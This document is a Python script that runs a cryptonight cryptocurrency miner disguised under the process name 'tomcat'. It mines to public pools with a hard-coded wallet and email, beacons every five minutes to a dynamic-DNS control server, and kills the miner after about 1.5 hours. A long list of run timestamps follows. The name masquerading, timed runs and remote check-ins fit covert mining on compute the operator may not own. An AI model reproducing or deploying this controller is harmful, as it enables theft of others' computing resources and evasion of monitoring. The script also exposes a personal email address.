import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:06.116655
#2018-02-17 16:38:05.202042
#2018-02-17 18:26:05.992770
#2018-02-17 20:14:02.075935
#2018-02-17 22:01:07.320811
#2018-02-17 23:45:08.526607
#2018-02-18 01:36:07.292100
#2018-02-18 03:23:06.031915
#2018-02-18 05:12:03.595646
#2018-02-18 07:04:04.890895
#2018-02-18 08:52:03.647933
#2018-02-18 10:39:01.751621
#2018-02-18 12:24:05.455334
#2018-02-18 14:12:04.049043
#2018-02-18 16:02:06.733996
#2018-02-18 17:52:07.190191
#2018-02-18 19:39:06.533989
#2018-02-18 21:24:01.450518
#2018-02-18 23:13:03.718045
#2018-02-19 00:59:03.665927
#2018-02-19 02:47:07.348748
#2018-02-19 04:32:07.586349
#2018-02-19 06:17:05.115546
#2018-02-19 08:05:06.604979
#2018-02-19 09:55:01.478000
#2018-02-19 11:44:04.468788
#2018-02-19 13:31:06.724866
#2018-02-19 15:20:04.704074
#2018-02-19 17:08:07.346476
#2018-02-19 18:53:09.007066
#2018-02-19 20:42:08.115469
#2018-02-19 22:29:01.866689
#2018-02-20 00:14:06.503532
#2018-02-20 02:02:07.459177
#2018-02-20 03:52:01.975261
#2018-02-20 05:37:07.321476
#2018-02-20 07:22:01.958561
#2018-02-20 09:07:01.979181
#2018-02-20 10:50:09.386282
#2018-02-20 12:37:08.447826
#2018-02-20 14:24:09.873666
#2018-02-20 16:10:12.262508
#2018-02-20 17:57:11.730023
#2018-02-20 19:49:01.971120
#2018-02-20 21:32:04.946744
#2018-02-20 23:15:07.461250
#2018-02-21 01:00:11.314302
#2018-02-21 02:47:05.448469
#2018-02-21 04:35:06.466144
#2018-02-21 06:23:01.872873
#2018-02-21 08:07:05.238018
#2018-02-21 09:53:07.376449
#2018-02-21 11:42:11.270731
#2018-02-21 13:32:03.976237
#2018-02-21 15:16:11.380398
#2018-02-21 17:08:06.831640
#2018-02-21 18:57:01.940935
#2018-02-21 20:46:05.119054
#2018-02-21 22:31:05.119238
#2018-02-22 00:21:08.172771
#2018-02-22 02:09:02.182785
#2018-02-22 03:55:07.334539
#2018-02-22 05:42:04.140482
#2018-02-22 07:27:01.479433
#2018-02-22 09:15:08.881396
#2018-02-22 11:02:08.896164
#2018-02-22 12:50:01.540750
#2018-02-22 14:36:09.123660
#2018-02-22 16:22:08.293347
#2018-02-22 18:09:07.979073
#2018-02-22 19:59:07.797603
#2018-02-22 21:49:01.400527
#2018-02-22 23:37:03.604210
#2018-02-23 01:24:07.805568
#2018-02-23 03:11:04.363375
#2018-02-23 04:59:03.893092
#2018-02-23 06:44:01.947623
#2018-02-23 08:35:07.856150
#2018-02-23 10:49:07.144783
#2018-02-23 12:47:07.580777
#2018-02-23 14:32:07.161402
#2018-02-23 16:23:07.584821
#2018-02-23 18:10:11.520518
#2018-02-23 19:56:06.463132
#2018-02-23 21:39:06.806258
#2018-02-23 23:31:01.364326
#2018-02-24 01:21:03.548990
#2018-02-24 03:13:06.448430
#2018-02-24 04:58:01.828297
#2018-02-24 06:44:07.342264
#2018-02-24 08:35:06.994802
#2018-02-24 10:21:06.023770
#2018-02-24 12:16:03.629002
#2018-02-24 14:07:03.836097
#2018-02-24 15:54:06.154433
#2018-02-24 17:42:08.675994
#2018-02-24 19:27:06.947770
#2018-02-24 21:18:02.162390
#2018-02-25 01:18:06.351764
#2018-02-25 05:19:02.206220
#2018-02-25 11:33:01.618921